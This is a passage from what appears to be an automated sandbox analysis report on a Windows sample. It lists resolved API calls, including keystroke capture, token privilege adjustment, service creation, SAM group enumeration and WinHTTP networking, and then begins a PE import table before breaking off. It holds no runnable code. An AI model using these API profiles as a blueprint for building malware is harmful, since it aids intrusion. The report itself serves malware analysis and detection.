1598. "kernel32.dll.CreateEventA",
1599. "kernel32.dll.CreateEventW",
1600. "kernel32.dll.OpenSemaphoreW",
1601. "kernel32.dll.OpenWaitableTimerW",
1602. "kernel32.dll.CancelWaitableTimer",
1603. "kernel32.dll.LoadLibraryW",
1604. "kernel32.dll.GetStartupInfoA",
1605. "kernel32.dll.FindResourceA",
1606. "kernel32.dll.GetProfileIntW",
1607. "kernel32.dll.WriteProfileStringW",
1608. "kernel32.dll.GetPrivateProfileIntW",
1609. "kernel32.dll.GetPrivateProfileStringW",
1610. "kernel32.dll.GetPrivateProfileSectionW",
1611. "kernel32.dll.GetDriveTypeA",
1612. "kernel32.dll.GetDriveTypeW",
1613. "kernel32.dll.GetSystemDirectoryA",
1614. "kernel32.dll.GetSystemDirectoryW",
1615. "kernel32.dll.GetTempFileNameA",
1616. "kernel32.dll.GetSystemWindowsDirectoryA",
1617. "kernel32.dll.GetCurrentDirectoryA",
1618. "kernel32.dll.GetDllDirectoryA",
1619. "kernel32.dll.GetDllDirectoryW",
1620. "kernel32.dll.GetDiskFreeSpaceA",
1621. "kernel32.dll.RemoveDirectoryW",
1622. "kernel32.dll.GetFullPathNameA",
1623. "kernel32.dll.DefineDosDeviceW",
1624. "kernel32.dll.GetFileAttributesA",
1625. "kernel32.dll.GetFileAttributesW",
1626. "kernel32.dll.GetFileAttributesExA",
1627. "kernel32.dll.FindFirstFileA",
1628. "kernel32.dll.SearchPathA",
1629. "kernel32.dll.SearchPathW",
1630. "kernel32.dll.CheckRemoteDebuggerPresent",
1631. "kernel32.dll.ReplaceFileW",
1632. "kernel32.dll.CreateNamedPipeA",
1633. "kernel32.dll.FindCloseChangeNotification",
1634. "kernel32.dll.GetDefaultCommConfigA",
1635. "kernel32.dll.GetComputerNameExA",
1636. "kernel32.dll.GetComputerNameExW",
1637. "kernel32.dll.CancelTimerQueueTimer",
1638. "kernel32.dll.VerifyVersionInfoW",
1639. "kernel32.dll.OpenJobObjectA",
1640. "kernel32.dll.DeleteVolumeMountPointA",
1641. "kernel32.dll.DeleteVolumeMountPointW",
1642. "kernel32.dll.GetVolumeNameForVolumeMountPointW",
1643. "kernel32.dll.GetVolumePathNamesForVolumeNameA",
1644. "kernel32.dll.GetCurrentActCtx",
1645. "kernel32.dll.FindActCtxSectionGuid",
1646. "kernel32.dll.CompareStringA",
1647. "kernel32.dll.CompareStringW",
1648. "kernel32.dll.GetCalendarInfoA",
1649. "kernel32.dll.GetTimeFormatW",
1650. "kernel32.dll.IsValidLocale",
1651. "kernel32.dll.GetGeoInfoA",
1652. "kernel32.dll.GetThreadLocale",
1653. "kernel32.dll.GetUserDefaultLCID",
1654. "kernel32.dll.WriteConsoleOutputCharacterW",
1655. "kernel32.dll.FillConsoleOutputCharacterW",
1656. "kernel32.dll.GetConsoleFontSize",
1657. "kernel32.dll.SetConsoleCtrlHandler",
1658. "kernel32.dll.DebugBreakProcess",
1659. "kernel32.dll.WaitNamedPipeW",
1660. "kernel32.dll.GetExitCodeProcess",
1661. "kernel32.dll.lstrcmpiW",
1662. "kernel32.dll.GetModuleFileNameW",
1663. "kernel32.dll.LockResource",
1664. "kernel32.dll.LoadResource",
1665. "kernel32.dll.FindResourceW",
1666. "kernel32.dll.SetHandleInformation",
1667. "kernel32.dll.ExpandEnvironmentStringsW",
1668. "kernel32.dll.PeekNamedPipe",
1669. "kernel32.dll.GetTimeFormatA",
1670. "kernel32.dll.FreeResource",
1671. "kernel32.dll.GetDateFormatA",
1672. "kernel32.dll.MoveFileExW",
1673. "kernel32.dll.CreateProcessW",
1674. "kernel32.dll.GlobalLock",
1675. "kernel32.dll.InterlockedIncrement",
1676. "kernel32.dll.CreateDirectoryW",
1677. "kernel32.dll.DeleteFileW",
1678. "kernel32.dll.MoveFileW",
1679. "kernel32.dll.CreateToolhelp32Snapshot",
1680. "kernel32.dll.Process32NextW",
1681. "kernel32.dll.Process32FirstW",
1682. "kernel32.dll.lstrcmpW",
1683. "kernel32.dll.SetFileTime",
1684. "kernel32.dll.ProcessIdToSessionId",
1685. "kernel32.dll.SleepEx",
1686. "kernel32.dll.GetFileTime",
1687. "kernel32.dll.GetLogicalDrives",
1688. "kernel32.dll.FindFirstFileW",
1689. "kernel32.dll.FindNextFileW",
1690. "kernel32.dll.SetFileAttributesW",
1691. "kernel32.dll.QueryPerformanceFrequency",
1692. "kernel32.dll.OpenEventW",
1693. "kernel32.dll.SetEvent",
1694. "kernel32.dll.LocalAlloc",
1695. "kernel32.dll.GetComputerNameW",
1696. "kernel32.dll.GetComputerNameA",
1697. "kernel32.dll.SetThreadPriority",
1698. "kernel32.dll.ResumeThread",
1699. "kernel32.dll.CreateSemaphoreW",
1700. "kernel32.dll.QueueUserAPC",
1701. "kernel32.dll.GetQueuedCompletionStatus",
1702. "kernel32.dll.GetThreadSelectorEntry",
1703. "kernel32.dll.TerminateThread",
1704. "kernel32.dll.GetThreadIOPendingFlag",
1705. "kernel32.dll.RequestWakeupLatency",
1706. "kernel32.dll.CreateThread",
1707. "kernel32.dll.ConvertFiberToThread",
1708. "kernel32.dll.FreeEnvironmentStringsA",
1709. "kernel32.dll.GetBinaryTypeA",
1710. "kernel32.dll.VirtualQueryEx",
1711. "kernel32.dll.LocalSize",
1712. "kernel32.dll.LocalReAlloc",
1713. "kernel32.dll.GlobalMemoryStatus",
1714. "kernel32.dll.GlobalUnlock",
1715. "kernel32.dll.GlobalSize",
1716. "kernel32.dll.GlobalReAlloc",
1717. "kernel32.dll.GetVersion",
1718. "kernel32.dll.RtlCaptureContext",
1719. "kernel32.dll.DebugActiveProcessStop",
1720. "kernel32.dll.WaitForDebugEvent",
1721. "kernel32.dll.GetLocaleInfoW",
1722. "kernel32.dll.WaitForSingleObjectEx",
1723. "kernel32.dll.FreeLibraryAndExitThread",
1724. "kernel32.dll.EnumSystemLocalesW",
1725. "kernel32.dll.ReadConsoleW",
1726. "kernel32.dll.SetEnvironmentVariableA",
1727. "kernel32.dll.CopyFileExA",
1728. "kernel32.dll.GetSystemInfo",
1729. "user32.dll.GetThreadDesktop",
1730. "user32.dll.SendMessageW",
1731. "user32.dll.GetIconInfo",
1732. "user32.dll.GetClipboardOwner",
1733. "user32.dll.SetClipboardViewer",
1734. "user32.dll.EqualRect",
1735. "user32.dll.GetWindowRect",
1736. "user32.dll.GetWindowLongW",
1737. "user32.dll.OpenDesktopW",
1738. "user32.dll.FindWindowW",
1739. "user32.dll.PostMessageW",
1740. "user32.dll.GetDC",
1741. "user32.dll.IntersectRect",
1742. "user32.dll.EnumWindows",
1743. "user32.dll.IsWindowVisible",
1744. "user32.dll.SetTimer",
1745. "user32.dll.PostThreadMessageW",
1746. "user32.dll.SetWinEventHook",
1747. "user32.dll.SystemParametersInfoW",
1748. "user32.dll.WinHelpW",
1749. "user32.dll.TranslateMDISysAccel",
1750. "user32.dll.DefFrameProcW",
1751. "user32.dll.IsDialogMessageW",
1752. "user32.dll.LoadStringW",
1753. "user32.dll.LoadStringA",
1754. "user32.dll.DestroyIcon",
1755. "user32.dll.LoadIconA",
1756. "user32.dll.DestroyCursor",
1757. "user32.dll.GetWindowThreadProcessId",
1758. "user32.dll.FindWindowA",
1759. "user32.dll.IsRectEmpty",
1760. "user32.dll.InflateRect",
1761. "user32.dll.GetSysColorBrush",
1762. "user32.dll.HideCaret",
1763. "user32.dll.GetCaretBlinkTime",
1764. "user32.dll.SetCursor",
1765. "user32.dll.SetWindowTextA",
1766. "user32.dll.GetScrollPos",
1767. "user32.dll.SetScrollPos",
1768. "user32.dll.GetUserObjectInformationW",
1769. "user32.dll.EndPaint",
1770. "user32.dll.CloseDesktop",
1771. "user32.dll.SetActiveWindow",
1772. "user32.dll.UpdateWindow",
1773. "user32.dll.DrawTextW",
1774. "user32.dll.DrawTextA",
1775. "user32.dll.GetSubMenu",
1776. "user32.dll.EnableMenuItem",
1777. "user32.dll.DestroyMenu",
1778. "user32.dll.GetSystemMenu",
1779. "user32.dll.GetMenuState",
1780. "user32.dll.SetMenu",
1781. "user32.dll.LoadMenuIndirectW",
1782. "user32.dll.TranslateAcceleratorA",
1783. "user32.dll.IsWindowEnabled",
1784. "user32.dll.EnableWindow",
1785. "user32.dll.MsgWaitForMultipleObjects",
1786. "user32.dll.SetFocus",
1787. "user32.dll.IsCharUpperW",
1788. "user32.dll.CharNextA",
1789. "user32.dll.CharUpperW",
1790. "user32.dll.CharUpperA",
1791. "user32.dll.IsDlgButtonChecked",
1792. "user32.dll.GetDlgItemTextW",
1793. "user32.dll.GetDlgItemTextA",
1794. "user32.dll.GetDlgItem",
1795. "user32.dll.DialogBoxParamW",
1796. "user32.dll.CreateDialogParamW",
1797. "user32.dll.CreateDialogParamA",
1798. "user32.dll.IsZoomed",
1799. "user32.dll.AnyPopup",
1800. "user32.dll.BeginDeferWindowPos",
1801. "user32.dll.IsWindow",
1802. "user32.dll.InSendMessage",
1803. "user32.dll.CallWindowProcW",
1804. "user32.dll.DefWindowProcW",
1805. "user32.dll.DefWindowProcA",
1806. "user32.dll.AttachThreadInput",
1807. "user32.dll.SendMessageA",
1808. "user32.dll.PeekMessageW",
1809. "user32.dll.PeekMessageA",
1810. "user32.dll.GetMessageA",
1811. "user32.dll.SetWindowLongW",
1812. "user32.dll.PostQuitMessage",
1813. "user32.dll.GetCursorPos",
1814. "user32.dll.VkKeyScanExW",
1815. "user32.dll.MapVirtualKeyW",
1816. "user32.dll.GetAsyncKeyState",
1817. "user32.dll.OpenClipboard",
1818. "user32.dll.DispatchMessageW",
1819. "user32.dll.GetCursorInfo",
1820. "user32.dll.ChangeClipboardChain",
1821. "user32.dll.CloseClipboard",
1822. "user32.dll.EmptyClipboard",
1823. "user32.dll.OpenInputDesktop",
1824. "user32.dll.ReleaseDC",
1825. "user32.dll.SetClipboardData",
1826. "user32.dll.LoadKeyboardLayoutW",
1827. "user32.dll.SendMessageTimeoutW",
1828. "user32.dll.keybd_event",
1829. "user32.dll.GetSystemMetrics",
1830. "user32.dll.SetThreadDesktop",
1831. "user32.dll.GetKeyboardState",
1832. "user32.dll.ExitWindowsEx",
1833. "user32.dll.mouse_event",
1834. "user32.dll.MessageBoxA",
1835. "user32.dll.DestroyWindow",
1836. "user32.dll.CreateWindowExW",
1837. "user32.dll.RegisterClassExW",
1838. "user32.dll.ScrollDC",
1839. "user32.dll.GetMessageW",
1840. "gdi32.dll.GdiFlush",
1841. "gdi32.dll.SelectObject",
1842. "gdi32.dll.CreateCompatibleBitmap",
1843. "gdi32.dll.BitBlt",
1844. "gdi32.dll.CreateDIBSection",
1845. "gdi32.dll.CreateCompatibleDC",
1846. "gdi32.dll.RealizePalette",
1847. "gdi32.dll.GetDIBits",
1848. "gdi32.dll.GetDeviceCaps",
1849. "gdi32.dll.GetSystemPaletteEntries",
1850. "gdi32.dll.DeleteDC",
1851. "gdi32.dll.CreatePalette",
1852. "gdi32.dll.CreateRectRgnIndirect",
1853. "gdi32.dll.GetRegionData",
1854. "gdi32.dll.CombineRgn",
1855. "gdi32.dll.GetBitmapBits",
1856. "gdi32.dll.GetObjectW",
1857. "gdi32.dll.DeleteObject",
1858. "gdi32.dll.LPtoDP",
1859. "gdi32.dll.ExtTextOutA",
1860. "gdi32.dll.SetAbortProc",
1861. "gdi32.dll.StartPage",
1862. "gdi32.dll.StartDocW",
1863. "gdi32.dll.UpdateColors",
1864. "gdi32.dll.StretchBlt",
1865. "gdi32.dll.SelectPalette",
1866. "gdi32.dll.GetPaletteEntries",
1867. "gdi32.dll.GetMetaFileW",
1868. "gdi32.dll.Escape",
1869. "gdi32.dll.EqualRgn",
1870. "gdi32.dll.Ellipse",
1871. "gdi32.dll.CreateRectRgn",
1872. "gdi32.dll.CreateFontIndirectA",
1873. "comdlg32.dll.GetSaveFileNameW",
1874. "comdlg32.dll.GetSaveFileNameA",
1875. "comdlg32.dll.GetOpenFileNameW",
1876. "comdlg32.dll.ReplaceTextW",
1877. "comdlg32.dll.FindTextW",
1878. "comdlg32.dll.FindTextA",
1879. "comdlg32.dll.GetFileTitleW",
1880. "advapi32.dll.RegCreateKeyExA",
1881. "advapi32.dll.DeleteService",
1882. "advapi32.dll.ControlService",
1883. "advapi32.dll.StartServiceW",
1884. "advapi32.dll.EnumServicesStatusExW",
1885. "advapi32.dll.QueryServiceConfigW",
1886. "advapi32.dll.OpenServiceW",
1887. "advapi32.dll.ConvertSidToStringSidW",
1888. "advapi32.dll.GetTokenInformation",
1889. "advapi32.dll.RegisterServiceCtrlHandlerExW",
1890. "advapi32.dll.SetTokenInformation",
1891. "advapi32.dll.SetServiceStatus",
1892. "advapi32.dll.CreateProcessAsUserW",
1893. "advapi32.dll.StartServiceCtrlDispatcherW",
1894. "advapi32.dll.DuplicateTokenEx",
1895. "advapi32.dll.RegSetValueExA",
1896. "advapi32.dll.RegQueryValueExA",
1897. "advapi32.dll.OpenSCManagerA",
1898. "advapi32.dll.RegRestoreKeyW",
1899. "advapi32.dll.RegOpenKeyExA",
1900. "advapi32.dll.RegOpenKeyA",
1901. "advapi32.dll.RegNotifyChangeKeyValue",
1902. "advapi32.dll.RegDeleteValueW",
1903. "advapi32.dll.RegCreateKeyA",
1904. "advapi32.dll.OpenProcessToken",
1905. "advapi32.dll.CloseServiceHandle",
1906. "advapi32.dll.QueryServiceStatus",
1907. "advapi32.dll.CreateServiceW",
1908. "advapi32.dll.InitiateSystemShutdownExW",
1909. "advapi32.dll.AdjustTokenPrivileges",
1910. "advapi32.dll.LookupPrivilegeValueW",
1911. "advapi32.dll.AccessCheck",
1912. "advapi32.dll.SetSecurityDescriptorOwner",
1913. "advapi32.dll.AllocateAndInitializeSid",
1914. "advapi32.dll.GetSidSubAuthority",
1915. "advapi32.dll.IsValidSecurityDescriptor",
1916. "advapi32.dll.FreeSid",
1917. "advapi32.dll.InitializeAcl",
1918. "advapi32.dll.DuplicateToken",
1919. "advapi32.dll.GetLengthSid",
1920. "advapi32.dll.AddAccessAllowedAce",
1921. "advapi32.dll.SetSecurityDescriptorGroup",
1922. "advapi32.dll.RegDeleteKeyA",
1923. "advapi32.dll.OpenSCManagerW",
1924. "advapi32.dll.RegCreateKeyExW",
1925. "advapi32.dll.RegEnumKeyExW",
1926. "advapi32.dll.ImpersonateLoggedOnUser",
1927. "advapi32.dll.RevertToSelf",
1928. "advapi32.dll.RegQueryValueExW",
1929. "shell32.dll.SHGetSpecialFolderPathW",
1930. "shell32.dll.ShellExecuteW",
1931. "shell32.dll.ShellAboutW",
1932. "kernel32.dll.FlsFree",
1933. "kernel32.dll.InitOnceExecuteOnce",
1934. "kernel32.dll.CreateEventExW",
1935. "kernel32.dll.CreateSemaphoreExW",
1936. "kernel32.dll.CreateThreadpoolTimer",
1937. "kernel32.dll.SetThreadpoolTimer",
1938. "kernel32.dll.WaitForThreadpoolTimerCallbacks",
1939. "kernel32.dll.CloseThreadpoolTimer",
1940. "kernel32.dll.CreateThreadpoolWait",
1941. "kernel32.dll.SetThreadpoolWait",
1942. "kernel32.dll.CloseThreadpoolWait",
1943. "kernel32.dll.FlushProcessWriteBuffers",
1944. "kernel32.dll.FreeLibraryWhenCallbackReturns",
1945. "kernel32.dll.GetCurrentProcessorNumber",
1946. "kernel32.dll.CreateSymbolicLinkW",
1947. "kernel32.dll.GetTickCount64",
1948. "kernel32.dll.GetFileInformationByHandleEx",
1949. "kernel32.dll.SetFileInformationByHandle",
1950. "kernel32.dll.InitializeConditionVariable",
1951. "kernel32.dll.WakeConditionVariable",
1952. "kernel32.dll.WakeAllConditionVariable",
1953. "kernel32.dll.SleepConditionVariableCS",
1954. "kernel32.dll.TryAcquireSRWLockExclusive",
1955. "kernel32.dll.SleepConditionVariableSRW",
1956. "kernel32.dll.CreateThreadpoolWork",
1957. "kernel32.dll.SubmitThreadpoolWork",
1958. "kernel32.dll.CloseThreadpoolWork",
1959. "kernel32.dll.CompareStringEx",
1960. "kernel32.dll.GetLocaleInfoEx",
1961. "api-ms-win-core-synch-l1-2-0.dll.InitializeConditionVariable",
1962. "api-ms-win-core-synch-l1-2-0.dll.SleepConditionVariableCS",
1963. "api-ms-win-core-synch-l1-2-0.dll.WakeAllConditionVariable",
1964. "kernel32.dll.WTSGetActiveConsoleSessionId",
1965. "ntdll.dll.RtlGetVersion",
1966. "dwmapi.dll.DwmIsCompositionEnabled",
1967. "kbdus.dll.#1",
1968. "kernel32.dll.GetNativeSystemInfo",
1969. "sechost.dll.LookupAccountNameLocalW",
1970. "advapi32.dll.LookupAccountSidW",
1971. "sechost.dll.LookupAccountSidLocalW",
1972. "kernel32.dll.GetThreadPreferredUILanguages",
1973. "kernel32.dll.SetThreadPreferredUILanguages",
1974. "kernel32.dll.LocaleNameToLCID",
1975. "kernel32.dll.LCIDToLocaleName",
1976. "kernel32.dll.GetSystemDefaultLocaleName",
1977. "oleaut32.dll.#283",
1978. "oleaut32.dll.#284",
1979. "kernel32.dll.RegOpenKeyExW",
1980. "ntdll.dll.EtwUnregisterTraceGuids",
1981. "sechost.dll.QueryServiceConfigW",
1982. "winsta.dll.WinStationRegisterNotificationEvent",
1983. "advapi32.dll.CreateWellKnownSid",
1984. "rpcrt4.dll.RpcStringBindingComposeW",
1985. "rpcrt4.dll.RpcBindingFromStringBindingW",
1986. "rpcrt4.dll.RpcStringFreeW",
1987. "rpcrt4.dll.RpcBindingSetAuthInfoExW",
1988. "rpcrt4.dll.RpcAsyncInitializeHandle",
1989. "rpcrt4.dll.NdrClientCall2",
1990. "rpcrt4.dll.NdrAsyncClientCall",
1991. "winsta.dll.WinStationIsSessionRemoteable",
1992. "wtsapi32.dll.WTSQuerySessionInformationW",
1993. "winsta.dll.WinStationQueryInformationW",
1994. "rpcrt4.dll.I_RpcExceptionFilter",
1995. "wtsapi32.dll.WTSFreeMemory",
1996. "wmisvc.dll.ServiceMain",
1997. "sechost.dll.RegisterServiceCtrlHandlerExW",
1998. "sechost.dll.SetServiceStatus",
1999. "cryptsp.dll.CryptAcquireContextW",
2000. "cryptsp.dll.CryptGenRandom",
2001. "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
2002. "advapi32.dll.RegisterEventSourceW",
2003. "advapi32.dll.ReportEventW",
2004. "advapi32.dll.DeregisterEventSource",
2005. "advapi32.dll.WmiOpenBlock",
2006. "ole32.dll.CoGetClassObject",
2007. "ole32.dll.CoGetMarshalSizeMax",
2008. "ole32.dll.CoMarshalInterface",
2009. "ole32.dll.CoUnmarshalInterface",
2010. "ole32.dll.StringFromIID",
2011. "ole32.dll.CoGetPSClsid",
2012. "ole32.dll.CoReleaseMarshalData",
2013. "ole32.dll.DcomChannelSetHResult",
2014. "vssapi.dll.CreateWriter",
2015. "advapi32.dll.LookupAccountNameW",
2016. "samcli.dll.NetLocalGroupGetMembers",
2017. "samlib.dll.SamConnect",
2018. "rpcrt4.dll.NdrClientCall3",
2019. "samlib.dll.SamOpenDomain",
2020. "samlib.dll.SamLookupNamesInDomain",
2021. "samlib.dll.SamOpenAlias",
2022. "samlib.dll.SamFreeMemory",
2023. "samlib.dll.SamCloseHandle",
2024. "samlib.dll.SamGetMembersInAlias",
2025. "samlib.dll.SamEnumerateDomainsInSamServer",
2026. "samlib.dll.SamLookupDomainInSamServer",
2027. "ole32.dll.StringFromCLSID",
2028. "oleaut32.dll.#4",
2029. "oleaut32.dll.#7",
2030. "propsys.dll.VariantToPropVariant",
2031. "wbemcore.dll.Reinitialize",
2032. "wbemsvc.dll.DllGetClassObject",
2033. "wbemsvc.dll.DllCanUnloadNow",
2034. "authz.dll.AuthzInitializeContextFromToken",
2035. "authz.dll.AuthzInitializeObjectAccessAuditEvent2",
2036. "authz.dll.AuthzAccessCheck",
2037. "authz.dll.AuthzFreeAuditEvent",
2038. "authz.dll.AuthzFreeContext",
2039. "authz.dll.AuthzInitializeResourceManager",
2040. "authz.dll.AuthzFreeResourceManager",
2041. "rpcrt4.dll.RpcBindingCreateW",
2042. "rpcrt4.dll.RpcBindingBind",
2043. "rpcrt4.dll.I_RpcMapWin32Status",
2044. "advapi32.dll.EventRegister",
2045. "advapi32.dll.EventUnregister",
2046. "advapi32.dll.EventWrite",
2047. "kernel32.dll.RegCloseKey",
2048. "kernel32.dll.RegSetValueExW",
2049. "kernel32.dll.RegQueryValueExW",
2050. "wmisvc.dll.IsImproperShutdownDetected",
2051. "wevtapi.dll.EvtRender",
2052. "wevtapi.dll.EvtNext",
2053. "wevtapi.dll.EvtClose",
2054. "wevtapi.dll.EvtQuery",
2055. "wevtapi.dll.EvtCreateRenderContext",
2056. "rpcrt4.dll.RpcBindingSetOption",
2057. "ole32.dll.CoCreateFreeThreadedMarshaler",
2058. "ole32.dll.CreateStreamOnHGlobal",
2059. "cryptsp.dll.CryptReleaseContext",
2060. "kernelbase.dll.InitializeAcl",
2061. "kernelbase.dll.AddAce",
2062. "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
2063. "kernel32.dll.IsThreadAFiber",
2064. "kernel32.dll.OpenProcessToken",
2065. "kernelbase.dll.GetTokenInformation",
2066. "kernelbase.dll.DuplicateTokenEx",
2067. "kernelbase.dll.AdjustTokenPrivileges",
2068. "kernel32.dll.SetThreadToken",
2069. "kernelbase.dll.CheckTokenMembership",
2070. "ole32.dll.CLSIDFromString",
2071. "kernelbase.dll.AllocateAndInitializeSid",
2072. "oleaut32.dll.#285",
2073. "oleaut32.dll.#286",
2074. "oleaut32.dll.#17",
2075. "oleaut32.dll.#20",
2076. "oleaut32.dll.#19",
2077. "oleaut32.dll.#25",
2078. "authz.dll.AuthzInitializeContextFromSid",
2079. "ole32.dll.CoGetCallContext",
2080. "ole32.dll.CoImpersonateClient",
2081. "ole32.dll.CoRevertToSelf",
2082. "ole32.dll.CoSwitchCallContext",
2083. "lpk.dll.LpkEditControl",
2084. "comctl32.dll.InitCommonControlsEx",
2085. "kernel32.dll.HeapSetInformation",
2086. "advapi32.dll.CheckTokenMembership",
2087. "kernel32.dll.GetSystemWindowsDirectoryW",
2088. "kernel32.dll.CreateWaitableTimerW",
2089. "kernel32.dll.SetWaitableTimer",
2090. "ole32.dll.CLSIDFromOle1Class",
2091. "clbcatq.dll.GetCatalogObject",
2092. "clbcatq.dll.GetCatalogObject2",
2093. "ole32.dll.NdrOleInitializeExtension",
2094. "msi.dll.QueryInstanceCount",
2095. "msi.dll.DllGetClassObject",
2096. "msi.dll.DllCanUnloadNow",
2097. "rpcrt4.dll.I_RpcBindingInqLocalClientPID",
2098. "ntdll.dll.WinSqmIsOptedIn",
2099. "netapi32.dll.NetGetJoinInformation",
2100. "netapi32.dll.NetApiBufferFree",
2101. "shlwapi.dll.UrlIsW",
2102. "ole32.dll.StgOpenStorage",
2103. "kernel32.dll.GetFileAttributesExW",
2104. "advapi32.dll.SaferCreateLevel",
2105. "advapi32.dll.SaferCloseLevel",
2106. "apphelp.dll.SdbInitDatabase",
2107. "apphelp.dll.SdbFindFirstMsiPackage_Str",
2108. "apphelp.dll.SdbReleaseDatabase",
2109. "version.dll.GetFileVersionInfoSizeW",
2110. "version.dll.GetFileVersionInfoW",
2111. "version.dll.VerQueryValueW",
2112. "mscoree.dll.GetCORSystemDirectory",
2113. "advapi32.dll.RegQueryInfoKeyW",
2114. "advapi32.dll.RegEnumValueW",
2115. "kernel32.dll.SetThreadExecutionState",
2116. "sfc.dll.SfcIsKeyProtected",
2117. "goopdate.dll.DllEntry",
2118. "kernel32.dll.RtlCaptureStackBackTrace",
2119. "wkscli.dll.NetWkstaGetInfo",
2120. "kernel32.dll.CreateMutexExW",
2121. "rpcrt4.dll.UuidCreate",
2122. "psmachine.dll.DllGetClassObject",
2123. "psmachine.dll.DllCanUnloadNow",
2124. "winhttp.dll.WinHttpAddRequestHeaders",
2125. "winhttp.dll.WinHttpCheckPlatform",
2126. "winhttp.dll.WinHttpCloseHandle",
2127. "winhttp.dll.WinHttpConnect",
2128. "winhttp.dll.WinHttpCrackUrl",
2129. "winhttp.dll.WinHttpCreateUrl",
2130. "winhttp.dll.WinHttpDetectAutoProxyConfigUrl",
2131. "winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser",
2132. "winhttp.dll.WinHttpGetDefaultProxyConfiguration",
2133. "winhttp.dll.WinHttpGetProxyForUrl",
2134. "winhttp.dll.WinHttpOpen",
2135. "winhttp.dll.WinHttpOpenRequest",
2136. "winhttp.dll.WinHttpQueryAuthSchemes",
2137. "winhttp.dll.WinHttpQueryDataAvailable",
2138. "winhttp.dll.WinHttpQueryHeaders",
2139. "winhttp.dll.WinHttpQueryOption",
2140. "winhttp.dll.WinHttpReadData",
2141. "winhttp.dll.WinHttpReceiveResponse",
2142. "winhttp.dll.WinHttpSendRequest",
2143. "winhttp.dll.WinHttpSetDefaultProxyConfiguration",
2144. "winhttp.dll.WinHttpSetCredentials",
2145. "winhttp.dll.WinHttpSetOption",
2146. "winhttp.dll.WinHttpSetStatusCallback",
2147. "winhttp.dll.WinHttpSetTimeouts",
2148. "winhttp.dll.WinHttpWriteData",
2149. "shlwapi.dll.StrCmpNW",
2150. "shlwapi.dll.#153",
2151. "ws2_32.dll.GetAddrInfoW",
2152. "ws2_32.dll.WSASocketW",
2153. "ws2_32.dll.#2",
2154. "ws2_32.dll.FreeAddrInfoW",
2155. "ws2_32.dll.#6",
2156. "ws2_32.dll.#5",
2157. "schannel.dll.SpUserModeInitialize",
2158. "ws2_32.dll.WSASend",
2159. "ws2_32.dll.WSARecv",
2160. "ncrypt.dll.SslOpenProvider",
2161. "ncrypt.dll.GetSChannelInterface",
2162. "bcryptprimitives.dll.GetHashInterface",
2163. "ncrypt.dll.SslIncrementProviderReferenceCount",
2164. "ncrypt.dll.SslImportKey",
2165. "bcryptprimitives.dll.GetCipherInterface",
2166. "ncrypt.dll.SslLookupCipherSuiteInfo",
2167. "ncrypt.dll.BCryptOpenAlgorithmProvider",
2168. "ncrypt.dll.BCryptGetProperty",
2169. "ncrypt.dll.BCryptCreateHash",
2170. "ncrypt.dll.BCryptHashData",
2171. "ncrypt.dll.BCryptFinishHash",
2172. "ncrypt.dll.BCryptDestroyHash",
2173. "crypt32.dll.CertGetCertificateChain",
2174. "userenv.dll.GetUserProfileDirectoryW",
2175. "sechost.dll.ConvertStringSidToSidW",
2176. "userenv.dll.RegisterGPNotification",
2177. "gpapi.dll.RegisterGPNotificationInternal",
2178. "cryptsp.dll.CryptAcquireContextA",
2179. "cryptsp.dll.CryptCreateHash",
2180. "cryptsp.dll.CryptHashData",
2181. "cryptsp.dll.CryptVerifySignatureA",
2182. "cryptsp.dll.CryptDestroyKey",
2183. "cryptsp.dll.CryptDestroyHash",
2184. "bcryptprimitives.dll.GetAsymmetricEncryptionInterface",
2185. "ncrypt.dll.BCryptImportKeyPair",
2186. "ncrypt.dll.BCryptVerifySignature",
2187. "ncrypt.dll.BCryptDestroyKey",
2188. "crypt32.dll.CertVerifyCertificateChainPolicy",
2189. "crypt32.dll.CertFreeCertificateChain",
2190. "crypt32.dll.CertDuplicateCertificateContext",
2191. "ncrypt.dll.SslEncryptPacket",
2192. "ncrypt.dll.SslDecryptPacket",
2193. "winsta.dll.WinStationEnumerateW",
2194. "winsta.dll.WinStationFreeMemory",
2195. "qmgr.dll.ServiceMain",
2196. "bitsigd.dll.InitializeEx",
2197. "upnp.dll.DllGetClassObject",
2198. "upnp.dll.DllCanUnloadNow",
2199. "rpcrt4.dll.RpcStringBindingComposeA",
2200. "rpcrt4.dll.RpcBindingFromStringBindingA",
2201. "rpcrt4.dll.RpcStringFreeA",
2202. "oleaut32.dll.DllGetClassObject",
2203. "oleaut32.dll.DllCanUnloadNow",
2204. "sxs.dll.SxsOleAut32MapIIDToProxyStubCLSID",
2205. "advapi32.dll.RegQueryValueW",
2206. "oleaut32.dll.BSTR_UserSize",
2207. "oleaut32.dll.BSTR_UserMarshal",
2208. "oleaut32.dll.BSTR_UserUnmarshal",
2209. "oleaut32.dll.BSTR_UserFree",
2210. "oleaut32.dll.VARIANT_UserSize",
2211. "oleaut32.dll.VARIANT_UserMarshal",
2212. "oleaut32.dll.VARIANT_UserUnmarshal",
2213. "oleaut32.dll.VARIANT_UserFree",
2214. "oleaut32.dll.LPSAFEARRAY_UserSize",
2215. "oleaut32.dll.LPSAFEARRAY_UserMarshal",
2216. "oleaut32.dll.LPSAFEARRAY_UserUnmarshal",
2217. "oleaut32.dll.LPSAFEARRAY_UserFree",
2218. "advapi32.dll.LogonUserW",
2219. "sspicli.dll.LogonUserExExW",
2220. "wtsapi32.dll.WTSQueryUserToken",
2221. "advapi32.dll.QueryAllTracesW",
2222. "ole32.dll.CoRegisterClassObject",
2223. "iphlpapi.dll.GetAdaptersAddresses",
2224. "rpcrt4.dll.UuidFromStringW",
2225. "radarrs.dll.WdiDiagnosticModuleMain",
2226. "radarrs.dll.WdiHandleInstance",
2227. "radarrs.dll.WdiGetDiagnosticModuleInterfaceVersion"
2228. ]
2229.  
2230. [*] Static Analysis: {
2231. "pe": {
2232. "peid_signatures": null,
2233. "imports": [
2234. {
2235. "imports": [
2236. {
2237. "name": "GetCurrentThread",
2238. "address": "0x40a014"
2239. },
2240. {
2241. "name": "GetOEMCP",
2242. "address": "0x40a018"
2243. },
2244. {
2245. "name": "GetTickCount",
2246. "address": "0x40a01c"
2247. },
2248. {
2249. "name": "GetProcAddress",
2250. "address": "0x40a020"
2251. },
2252. {
2253. "name": "LoadLibraryA",
2254. "address": "0x40a024"
2255. },
2256. {
2257. "name": "GetLastError",
2258. "address": "0x40a028"
2259. },
2260. {
2261. "name": "GetCommandLineW",
2262. "address": "0x40a02c"
2263. },
2264. {
2265. "name": "GetProcessHeap",
2266. "address": "0x40a030"
2267. },
2268. {
2269. "name": "InterlockedIncrement",
